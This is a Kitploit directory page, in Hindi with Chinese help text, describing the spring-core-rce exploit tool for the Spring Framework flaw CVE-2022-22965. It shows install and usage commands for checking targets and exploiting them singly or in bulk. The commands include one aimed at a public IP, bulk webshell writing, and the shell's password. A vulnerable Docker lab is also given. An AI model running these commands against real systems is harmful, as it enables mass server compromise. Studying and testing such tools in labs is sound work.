Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
spring-core-rce — Spring फ्रेमवर्क RCE भेद्यता CVE-2022-22965 | Kitploit
उपकरण/GitHubGitHub/k3rwin/spring-core-rce
टोहीपेलोड जनरेशनभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंग
GitHubk3rwin/spring-core-rce

spring-core-rce

Spring फ्रेमवर्क RCE भेद्यता CVE-2022-22965

रिपॉजिटरी देखें
281124 साल पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

Spring Core RCE/CVE-2022-22965

प्रभावित क्षेत्र: JDK>=9 के स्प्रिंग फ्रेमवर्क और व्युत्पन्न फ्रेमवर्क

लेख का लिंक

स्क्रिप्ट केवल सीखने के उद्देश्य के लिए है, यदि अन्य उपयोगों में लाया जाए तो कानूनी जिम्मेदारी लेखक से संबंधित नहीं है

1.स्थापना

root@kitploit:~
pip3 install -r requirements.txt

2.उपयोग

root@kitploit:~
$ python3 spring-core-rce.py -h

 .----..-.-. .---. .-..-. .-..----.     .----. .---. .---. .----.     .---. .----..----.
{ {__-`| } }}} }}_}{ ||  \{ || |--' ___ | }`-'/ {-. \} }}_}} |__} ___ } }}_}| }`-'} |__}
.-._} }| |-' | } \ | }| }\  {| }-`}{___}| },-.\ '-} /| } \ } '__}{___}| } \ | },-.} '__}
`----' `-'   `-'-' `-'`-' `-'`----'     `----' `---' `-'-' `----'     `-'-' `----'`----'


                                                 Spring framework Core RCE
                                                                  By:K3rwin
usage: spring-core-rce.py [-h] [-u URL] [-s SYSTEM] [-r FILE]

Spring framework Core 0day RCE 帮助指南

optional arguments:
  -h, --help            show this help message and exit
  -u URL, --url URL     指定url
  -s SYSTEM, --system SYSTEM
                        指定目标主机操作系统,默认linux,参数为win/linux
  -r FILE, --file FILE  指定url文件,批量写马

3.उदाहरण

हानिरहित जांच

-u,--url या -f,--file का उपयोग करके बल्क जांच

-c,--check, पैरामीटर स्वयं-निर्मित HTTP सेवा है, python3 -m http.server 80 का उपयोग करके तेज़ी से एक वेब सर्वर बनाया जा सकता है

मुख्य रूप से आंतरिक नेटवर्क में उपयोग किया जाता है जब हानिरहित भेद्यता जांच की आवश्यकता होती है

root@kitploit:~
python3 spring-core-rce.py -u "http://172.26.155.18:8080/" --check "http://172.26.155.18"

image-20220422153433867

-u का उपयोग करके url निर्दिष्ट करें, -s का उपयोग करके ऑपरेटिंग सिस्टम निर्दिष्ट करें। पैरामीटर: linux या win, डिफ़ॉल्ट linux है।

root@kitploit:~
python3 spring-core-rce.py -u "http://1.117.155.217:8080/" -s "linux"

image-20220331203209702

image-20220331203858753

-r का उपयोग करके बल्क में वेबशेल लिखें, एंट स्वॉर्ड से कनेक्ट करें, पासवर्ड k3rwin है।

root@kitploit:~
python3 spring-core-rce.py -r "urls.txt"

image-20220402112140568

image-20220402112349943

4.लक्ष्य

①.स्थानीय डॉकर वातावरण बनाएं:

docker pull vulfocus/spring-core-rce-2022-03-29:latest

docker run -d -p 8080:8080 --name spring-core-rce -it vulfocus/spring-core-rce-2022-03-29

②.ऑनलाइन प्रैक्टिस वातावरण

टूल डाउनलोड करें